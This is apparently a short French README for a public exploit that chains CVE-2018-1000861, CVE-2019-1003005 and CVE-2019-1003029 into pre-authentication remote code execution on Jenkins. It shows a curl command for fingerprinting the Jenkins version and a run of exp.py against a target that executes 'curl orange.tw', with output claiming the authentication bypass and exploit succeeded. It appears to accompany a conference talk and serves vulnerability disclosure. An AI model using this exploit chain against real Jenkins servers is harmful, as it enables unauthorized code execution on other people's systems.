
Il n'y a pas de RCE pré-auth dans Jenkins depuis mai 2017, mais c'est celle-là !
Il n'y a pas eu de RCE sans authentification dans Jenkins depuis mai 2017, mais celle-ci est la bonne !
Elle enchaîne CVE-2018-1000861, CVE-2019-1003005 et CVE-2019-1003029 pour une exécution de code à distance sans authentification plus fiable et plus élégante !
ANONYMOUS_READ désactivé
ANONYMOUS_READ activé (ou avec un compte utilisateur normal)
$ curl -s -I http://jenkins/| grep X-Jenkins
X-Jenkins: 2.137
X-Jenkins-Session: 20f72c2e
X-Jenkins-CLI-Port: 50000
X-Jenkins-CLI2-Port: 50000
$ python exp.py http://jenkins/ 'curl orange.tw'
[*] ANONYMOUS_READ disable!
[*] Bypass with CVE-2018-1000861!
[*] Exploit success!(it should be :P)
Quelques diapositives de ma présentation HITB AMS 2019 :
